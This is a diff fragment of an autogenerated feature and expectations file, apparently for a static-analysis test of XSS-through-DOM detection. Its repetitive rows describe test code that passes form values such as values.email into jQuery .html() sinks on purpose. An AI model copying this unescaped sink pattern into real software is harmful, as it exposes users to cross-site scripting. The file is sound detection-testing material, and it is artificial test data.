autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | exceptional return of $("#id") | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | exceptional return of $("#id") | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:17 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:17 | $("#id").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:17 | $("#id").html | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:17 | $("#id").html | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:17 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | $("#id" ... .email) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | $("#id" ... .email) | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | $("#id" ... .email) | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | exceptional return of $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | exceptional return of $("#id" ... .email) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | exceptional return of $("#id" ... .email) | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | exceptional return of $("#id" ... .email) | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:31 | exceptional return of $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24341,6 +159545,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | enclosingFunctionName | | | autogenerated/Xss/XssThroughDom/forms.js:35:7:35:11 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:14:35:17 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:14:35:17 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:14:35:17 | html | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:14:35:17 | html | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:14:35:17 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:19:35:24 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:19:35:24 | values | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:19:35:24 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:19:35:24 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:19:35:24 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24348,6 +159562,41 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | enclosingFunctionName | | | autogenerated/Xss/XssThroughDom/forms.js:35:19:35:30 | values.email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:26:35:30 | email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:26:35:30 | email | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:26:35:30 | email | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:26:35:30 | email | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:26:35:30 | email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:5 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:5 | $ | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:5 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | $("#id") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | $("#id") | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | $("#id") | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | exceptional return of $("#id") | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | exceptional return of $("#id") | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:12 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:17 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:17 | $("#id").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:17 | $("#id").html | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:17 | $("#id").html | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:17 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | $("#id" ... .email) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | $("#id" ... .email) | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | $("#id" ... .email) | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | exceptional return of $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | exceptional return of $("#id" ... .email) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | exceptional return of $("#id" ... .email) | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | exceptional return of $("#id" ... .email) | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:5:37:35 | exceptional return of $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24355,6 +159604,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | enclosingFunctionName | | | autogenerated/Xss/XssThroughDom/forms.js:37:7:37:11 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:14:37:17 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:14:37:17 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:14:37:17 | html | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:14:37:17 | html | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:14:37:17 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:19:37:28 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:19:37:28 | submitForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:19:37:28 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:19:37:28 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:19:37:28 | submitForm | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24362,6 +159621,150 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | enclosingFunctionName | | | autogenerated/Xss/XssThroughDom/forms.js:37:19:37:34 | submitForm.email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:37:30:37:34 | email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:37:30:37:34 | email | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:37:30:37:34 | email | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:37:30:37:34 | email | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:37:30:37:34 | email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:1:40:39 | import ... l-form' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:1:40:39 | import ... l-form' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:1:40:39 | import ... l-form' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:10:40:13 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:40:22:40:39 | 'react-final-form' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:40:22:40:39 | 'react-final-form' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:40:22:40:39 | 'react-final-form' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:42:9 | App | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:42:9 | App | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:42:9 | App | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:54:1 | App = ( ... \\n />\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:54:1 | App = ( ... \\n />\\n) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:7:54:1 | App = ( ... \\n />\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:42:12 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:42:12 | Form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:42:12 | Form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:42:12 | Form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:42:12 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | 'arguments' object of function App | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | 'arguments' object of function App | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | 'arguments' object of function App | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | 'arguments' object of function App | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | 'arguments' object of function App | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | () => ( ... \\n />\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | () => ( ... \\n />\\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | () => ( ... \\n />\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | exceptional return of function App | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | exceptional return of function App | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | exceptional return of function App | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | exceptional return of function App | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | exceptional return of function App | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | return of function App | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | return of function App | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | return of function App | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | return of function App | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:42:13:54:1 | return of function App | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:42:19:54:1 | (\\n \\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:42:19:54:1 | (\\n \\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:42:19:54:1 | (\\n \\n) | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:42:19:54:1 | (\\n \\n) | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:42:19:54:1 | (\\n \\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:43:3:53:4 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:43:3:53:4 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:43:3:53:4 | | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:43:3:53:4 | | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:43:3:53:4 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:43:4:43:7 | Form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:43:4:43:7 | Form | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:43:4:43:7 | Form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:43:4:43:7 | Form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:43:4:43:7 | Form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:44:12 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:44:12 | onSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:44:12 | onSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:44:12 | onSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:44:12 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | 